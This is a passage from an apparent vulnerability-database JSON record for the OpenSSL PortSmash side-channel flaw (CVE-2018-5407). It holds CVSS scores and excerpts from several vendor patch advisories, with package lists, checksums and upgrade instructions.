"https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 1.9, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.4, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 1.9, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.4, "id": "VHN-135438", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "LOW", "trust": 0.1, "vectorString": "AV:L/AC:M/AU:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "NONE", "baseScore": 1.9, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.4, "id": "CVE-2018-5407", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "LOW", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "LOCAL", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.0, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" } ], "severity": [ { "author": "NVD", "id": "CVE-2018-5407", "trust": 1.0, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-135438", "trust": 0.1, "value": "LOW" }, { "author": "VULMON", "id": "CVE-2018-5407", "trust": 0.1, "value": "LOW" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-135438" }, { "db": "VULMON", "id": "CVE-2018-5407" }, { "db": "NVD", "id": "CVE-2018-5407" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Simultaneous Multi-threading (SMT) in processors can enable local users to exploit software vulnerable to timing attacks via a side-channel timing attack on \u0027port contention\u0027. The product supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, secure hash algorithms, etc. An information disclosure vulnerability exists in OpenSSL. This vulnerability stems from configuration errors in network systems or products during operation. An unauthorized attacker could exploit the vulnerability to obtain sensitive information of the affected components. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.2q-i586-1_slack14.2.txz: Upgraded. \n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5407\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0734\n (* Security fix *)\npatches/packages/openssl-solibs-1.0.2q-i586-1_slack14.2.txz: Upgraded. \n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1u-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1u-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1u-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1u-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1u-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1u-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1u-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1u-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-1.0.2q-i586-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-solibs-1.0.2q-i586-1_slack14.2.txz\n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-1.0.2q-x86_64-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-solibs-1.0.2q-x86_64-1_slack14.2.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.1.1a-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.1.1a-i586-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.1.1a-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.1.1a-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 packages:\ne6d4b3a76383f9f253da4128ba23f269 openssl-1.0.1u-i486-1_slack14.0.txz\nc61d31a1751ae39af89d3fee0b54f0d8 openssl-solibs-1.0.1u-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n96be19e6a96c9beb5d3bbc55348fb483 openssl-1.0.1u-x86_64-1_slack14.0.txz\nb7a8fa2ebd16c8ae106fc1267bc29eca openssl-solibs-1.0.1u-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n099b960e62eaea5d1a639a61a2fabca7 openssl-1.0.1u-i486-1_slack14.1.txz\nb5d5219e05db97f63c4d6c389d6884fb openssl-solibs-1.0.1u-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\nfc96c87d76c9d1efd1290ac847fa7c7c openssl-1.0.1u-x86_64-1_slack14.1.txz\ne873b66f84f45ea34d028a3d524ce573 openssl-solibs-1.0.1u-x86_64-1_slack14.1.txz\n\nSlackware 14.2 packages:\nd5f0cc19451e9c7e3967820cf02a20c6 openssl-1.0.2q-i586-1_slack14.2.txz\n594ca80447baecd608a51083b12a26d9 openssl-solibs-1.0.2q-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 packages:\n943bb2f3259ccf97a1b8b25f5f511c30 openssl-1.0.2q-x86_64-1_slack14.2.txz\n0d45afe2487c47b283c06902c56e4559 openssl-solibs-1.0.2q-x86_64-1_slack14.2.txz\n\nSlackware -current packages:\n6f01f6dd0f40a12e473320386cfc8536 a/openssl-solibs-1.1.1a-i586-1.txz\n6e5a2ab2475a0d851376d12911b3c6b7 n/openssl-1.1.1a-i586-1.txz\n\nSlackware x86_64 -current packages:\neb4697703f1f4b81ad38e9247ab70dac a/openssl-solibs-1.1.1a-x86_64-1.txz\n12a10fd6bd2344b3e73106c8d5b9828c n/openssl-1.1.1a-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.2q-i586-1_slack14.2.txz openssl-solibs-1.0.2q-i586-1_slack14.2.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. Solution:\n\nFor information on upgrading Ansible Tower, reference the Ansible Tower\nUpgrade and Migration Guide:\nhttps://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/\nindex.html\n\n4. Description:\n\nThis release adds the new Apache HTTP Server 2.4.37 packages that are part\nof the JBoss Core Services offering. \n\nThis release serves as a replacement for Red Hat JBoss Core Services Pack\nApache Server 2.4.29 and includes bug fixes and enhancements. \n\nSecurity Fix(es):\n\n* openssl: RSA key generation cache timing vulnerability in\ncrypto/rsa/rsa_gen.c allows attackers to recover private keys\n(CVE-2018-0737) * openssl: timing side channel attack in the DSA signature\nalgorithm (CVE-2018-0734) * mod_auth_digest: access control bypass due to\nrace condition (CVE-2019-0217) * openssl: Side-channel vulnerability on\nSMT/Hyper-Threading architectures (PortSmash) (CVE-2018-5407) *\nmod_session_cookie does not respect expiry time (CVE-2018-17199) *\nmod_http2: DoS via slow, unneeded request bodies (CVE-2018-17189) *\nmod_http2: possible crash on late upgrade (CVE-2019-0197) * mod_http2:\nread-after-free on a string compare (CVE-2019-0196) * nghttp2: HTTP/2:\nlarge amount of data request leads to denial of service (CVE-2019-9511) *\nnghttp2: HTTP/2: flood using PRIORITY frames resulting in excessive\nresource consumption (CVE-2019-9513) * mod_http2: HTTP/2: 0-length headers\nleads to denial of service (CVE-2019-9516) * mod_http2: HTTP/2: request for\nlarge response leads to denial of service (CVE-2019-9517)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. After installing the updated\npackages, the httpd daemon will be restarted automatically. Bugs fixed (https://bugzilla.redhat.com/):\n\n1568253 - CVE-2018-0737 openssl: RSA key generation cache timing vulnerability in crypto/rsa/rsa_gen.c allows attackers to recover private keys\n1644364 - CVE-2018-0734 openssl: timing side channel attack in the DSA signature algorithm\n1645695 - CVE-2018-5407 openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures (PortSmash)\n1668493 - CVE-2018-17199 httpd: mod_session_cookie does not respect expiry time\n1668497 - CVE-2018-17189 httpd: mod_http2: DoS via slow, unneeded request bodies\n1695020 - CVE-2019-0217 httpd: mod_auth_digest: access control bypass due to race condition\n1695030 - CVE-2019-0196 httpd: mod_http2: read-after-free on a string compare\n1695042 - CVE-2019-0197 httpd: mod_http2: possible crash on late upgrade\n1735741 - CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption\n1741860 - CVE-2019-9511 HTTP/2: large amount of data requests leads to denial of service\n1741864 - CVE-2019-9516 HTTP/2: 0-length headers lead to denial of service\n1741868 - CVE-2019-9517 HTTP/2: request for large response leads to denial of service\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: openssl security and bug fix update\nAdvisory ID: RHSA-2019:0483-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2019:0483\nIssue date: 2019-03-12\nCVE Names: CVE-2018-5407\n====================================================================\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, ppc64le, s390x\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, ppc64le, s390x\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n\nSecurity Fix(es):\n\n* openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures\n(PortSmash) (CVE-2018-5407)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* Perform the RSA signature self-tests with SHA-256 (BZ#1673914)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1645695 - CVE-2018-5407 openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures (PortSmash)\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.2k-16.el7_6.1.src.rpm\n\nx86_64:\nopenssl-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-libs-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-libs-1.0.2k-16.el7_6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-devel-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-devel-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-perl-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-static-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-static-1.0.2k-16.el7_6.1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.2k-16.el7_6.1.src.rpm\n\nx86_64:\nopenssl-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-libs-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-libs-1.0.2k-16.el7_6.1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-devel-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-devel-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-perl-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-static-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-static-1.0.2k-16.el7_6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.2k-16.el7_6.1.src.rpm\n\nppc64:\nopenssl-1.0.2k-16.el7_6.1.ppc64.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.ppc.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.ppc64.rpm\nopenssl-devel-1.0.2k-16.el7_6.1.ppc.rpm\nopenssl-devel-1.0.2k-16.el7_6.1.ppc64.rpm\nopenssl-libs-1.0.2k-16.el7_6.1.ppc.rpm\nopenssl-libs-1.0.2k-16.el7_6.1.ppc64.rpm\n\nppc64le:\nopenssl-1.0.2k-16.el7_6.1.ppc64le.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.ppc64le.rpm\nopenssl-devel-1.0.2k-16.el7_6.1.ppc64le.rpm\nopenssl-libs-1.0.2k-16.el7_6.1.ppc64le.rpm\n\ns390x:\nopenssl-1.0.2k-16.el7_6.1.s390x.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.s390.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.s390x.rpm\nopenssl-devel-1.0.2k-16.el7_6.1.s390.rpm\nopenssl-devel-1.0.2k-16.el7_6.1.s390x.rpm\nopenssl-libs-1.0.2k-16.el7_6.1.s390.rpm\nopenssl-libs-1.0.2k-16.el7_6.1.s390x.rpm\n\nx86_64:\nopenssl-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-devel-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-devel-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-libs-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-libs-1.0.2k-16.el7_6.1.x86_64.rpm\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):\n\nSource:\nopenssl-1.0.2k-16.el7_6.1.src.rpm\n\naarch64:\nopenssl-1.0.2k-16.el7_6.1.aarch64.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.aarch64.rpm\nopenssl-devel-1.0.2k-16.el7_6.1.aarch64.rpm\nopenssl-libs-1.0.2k-16.el7_6.1.aarch64.rpm\n\nppc64le:\nopenssl-1.0.2k-16.el7_6.1.ppc64le.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.ppc64le.rpm\nopenssl-devel-1.0.2k-16.el7_6.1.ppc64le.rpm\nopenssl-libs-1.0.2k-16.el7_6.1.ppc64le.rpm\n\ns390x:\nopenssl-1.0.2k-16.el7_6.1.s390x.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.s390.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.s390x.rpm\nopenssl-devel-1.0.2k-16.el7_6.1.s390.rpm\nopenssl-devel-1.0.2k-16.el7_6.1.s390x.rpm\nopenssl-libs-1.0.2k-16.el7_6.1.s390.rpm\nopenssl-libs-1.0.2k-16.el7_6.1.s390x.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.2k-16.el7_6.1.ppc.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.ppc64.rpm\nopenssl-perl-1.0.2k-16.el7_6.1.ppc64.rpm\nopenssl-static-1.0.2k-16.el7_6.1.ppc.rpm\nopenssl-static-1.0.2k-16.el7_6.1.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.2k-16.el7_6.1.ppc64le.rpm\nopenssl-perl-1.0.2k-16.el7_6.1.ppc64le.rpm\nopenssl-static-1.0.2k-16.el7_6.1.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.2k-16.el7_6.1.s390.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.s390x.rpm\nopenssl-perl-1.0.2k-16.el7_6.1.s390x.rpm\nopenssl-static-1.0.2k-16.el7_6.1.s390.rpm\nopenssl-static-1.0.2k-16.el7_6.1.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-perl-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-static-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-static-1.0.2k-16.el7_6.1.x86_64.rpm\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):\n\naarch64:\nopenssl-debuginfo-1.0.2k-16.el7_6.1.aarch64.rpm\nopenssl-perl-1.0.2k-16.el7_6.1.aarch64.rpm\nopenssl-static-1.0.2k-16.el7_6.1.aarch64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.2k-16.el7_6.1.ppc64le.rpm\nopenssl-perl-1.0.2k-16.el7_6.1.ppc64le.rpm\nopenssl-static-1.0.2k-16.el7_6.1.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.2k-16.el7_6.1.s390.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.s390x.rpm\nopenssl-perl-1.0.2k-16.el7_6.1.s390x.rpm\nopenssl-static-1.0.2k-16.el7_6.1.s390.rpm\nopenssl-static-1.0.2k-16.el7_6.1.s390x.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.2k-16.el7_6.1.src.rpm\n\nx86_64:\nopenssl-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-devel-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-devel-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-libs-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-libs-1.0.2k-16.el7_6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-debuginfo-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-perl-1.0.2k-16.el7_6.1.x86_64.rpm\nopenssl-static-1.0.2k-16.el7_6.1.i686.rpm\nopenssl-static-1.0.2k-16.el7_6.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-5407\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXIj7zdzjgjWX9erEAQiieQ//TzEytTXxxzNqnsMz3yxbDgb1jni0dPYx\n6If80sSKu32kPgoTUgTcoJ27jUIpupYHJj3ml1zhF0zTqMAd2fYXkl2/0HSzbX6z\nw7FKXiRuzoA8JNG+bbqNjLhwsJBP4Avqfi/S9Z/s/0v93ep54Aqo9pmxfZYJuUMQ\nGncD2JcidZXLm1sky4PFl59D94szXdRkkzS3xxYcp37dyAUxwqOyzDPwbDA4q3CO\n4+TBL1hevmm5FSJjp/Bux70iEXubT+aGRM7Ab1Qex1h6rZjOfEgZabLOAJL9feGT\nmXPnML6DW96C4W9urZJZZcYJcZ34MfeH7TjaFKjfKeDIlb0fzdGuDqsrUXi95GjF\natGtjkXsu5n2Nh3QQNvTRs5N+0w1PSp5VMlrQbeizE0FQVH60z6EUUGlcKEQglof\nGs+pRtn7e9R/ncCNOrGAW0QbkmCGge3cg/kYlrJTt5dvQH1oSuG49ZqowG5It4vT\nkzIIDIhxrQrHE23eV7O1g48nV8/rPIZI6W2UuYs4sgQuWAtHx1gncWGXwiWRNtn1\n38Iqnd+UBpxwBgb+fYYwZ54SOpLXGeUa1pR+ZV2+ToEmGM1yHQ+DMVKhRlAojKYa\nqwSvm7HPdu7ceUkW3HTOwU8llXOGmXJ0UIr+reqIJBemRg/24NeHZ20a9qMeybEX\nt5ytPgxAFC4=jvvo\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 1.1.0j-1~deb9u1. \n\nFor the detailed security status of openssl please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/openssl\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlwBuAcACgkQEMKTtsN8\nTjZbBw/+MOB5+pZbCHHXyH3IeD+yj+tSPvmNc3SCwdEtUxGXr0ZX7TKHfaLs/8s6\nUdto0K8a1FvjrcUQCfhnFpNcSAv9pxX13Fr6Pd560miIfAu9/5jAqiCufCoiz+xj\n45LNJGlaxxaFjgBGCitZSJA0Fc4SM6v5XFyJfR3kChdQ/3kGQbbMNAp16Fy3ZsxJ\nVXwviomUxmmmdvjxyhifTIpuwr9OiJSQ+13etQjTDQ3pzSbLBPSOxmpV0vPIC7I2\nDwa4zuQXA/DF4G6l8T4rXCwCN4e4pwbTc8bbCjXeZK+iVAhnRD6wXlS3cc5IVAzx\n/qTa89LZU8B6ylcB6nodeAHLuZTC3Le8ndoxYz5S2/jHZMM/jCQNHYJemHWNbOqn\nq+e5W0D1fIVLiLoL/iHW5XhN6yJY2Ma7zjXMRBnkzJA9CTNIKgUjrSFz0Ud+wIM/\nu8QhNPwZ0hPd5IfSgIyWqmuQ5XzFYqAQvwT1gUJiK7tIvuT0VsSyKVaSZVbi4yrM\n9sxkZaP1UNLcTVCFw6A0KFwhb9z6kQtyH1MRkFPphmnb8jlHA3cTdPJkFUBi3VaT\n7izThm5/mVLbAjZ8X7nkqnzWzmc885j0ml3slDd/MOVWB5CD3vFAcI8k3VZr3A61\nP2gNSN6UbAbLMGsxgs3hYUHgazi7MdXJ/aNavjGSbYBNL780Iaw=3Qji\n-----END PGP SIGNATURE-----\n. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nTomcat Servlet container, JBoss HTTP Connector (mod_cluster), the\nPicketLink Vault extension for Apache Tomcat, and the Tomcat Native\nlibrary. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. 7) - noarch\n\n3. Description:\n\nOVMF (Open Virtual Machine Firmware) is a project to enable UEFI support\nfor Virtual Machines. This package contains a sample 64-bit UEFI firmware\nfor QEMU and KVM. \n\nSecurity Fix(es):\n\n* edk2: Privilege escalation via processing of malformed files in\nTianoCompress.c (CVE-2017-5731)\n\n* edk2: Privilege escalation via processing of malformed files in\nBaseUefiDecompressLib.c (CVE-2017-5732)\n\n* edk2: Privilege escalation via heap-based buffer overflow in MakeTable()\nfunction (CVE-2017-5733)\n\n* edk2: Privilege escalation via stack-based buffer overflow in MakeTable()\nfunction (CVE-2017-5734)\n\n* edk2: Privilege escalation via heap-based buffer overflow in Decode()\nfunction (CVE-2017-5735)\n\n* edk2: Logic error in MdeModulePkg in EDK II firmware allows for privilege\nescalation by authenticated users (CVE-2018-3613)\n\n* openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures\n(PortSmash) (CVE-2018-5407)\n\n* edk2: Stack buffer overflow with corrupted BMP (CVE-2018-12181)\n\n* edk2: buffer overflows in PartitionDxe and UdfDxe with long file names\nand invalid UDF media (CVE-2019-0160)\n\n* edk2: stack overflow in XHCI causing denial of service (CVE-2019-0161)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.7 Release Notes linked from the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n1641433 - CVE-2018-3613 edk2: Logic error in MdeModulePkg in EDK II firmware allows for privilege escalation by authenticated users\n1641442 - CVE-2017-5731 edk2: Privilege escalation via processing of malformed files in TianoCompress.c\n1641446 - CVE-2017-5732 edk2: Privilege escalation via processing of malformed files in BaseUefiDecompressLib.c\n1641450 - CVE-2017-5733 edk2: Privilege escalation via heap-based buffer overflow in MakeTable() function\n1641458 - CVE-2017-5734 edk2: Privilege escalation via stack-based buffer overflow in MakeTable() function\n1641465 - CVE-2017-5735 edk2: Privilege escalation via heap-based buffer overflow in Decode() function\n1645695 - CVE-2018-5407 openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures (PortSmash)\n1686783 - CVE-2018-12181 edk2: Stack buffer overflow with corrupted BMP\n1691640 - CVE-2019-0160 edk2: buffer overflows in PartitionDxe and UdfDxe with long file names and invalid UDF media\n1694065 - CVE-2019-0161 edk2: stack overflow in XHCI causing denial of service\n\n6. OpenSSL Security Advisory [12 November 2018]\n============================================\n\nMicroarchitecture timing vulnerability in ECC scalar multiplication (CVE-2018-5407)\n===================================================================================\n\nSeverity: Low\n\nOpenSSL ECC scalar multiplication, used in e.g. ECDSA and ECDH, has been shown\nto be vulnerable to a microarchitecture timing side channel attack. An attacker\nwith sufficient access to mount local timing attacks during ECDSA signature\ngeneration could recover the private key. \n\nThis issue does not impact 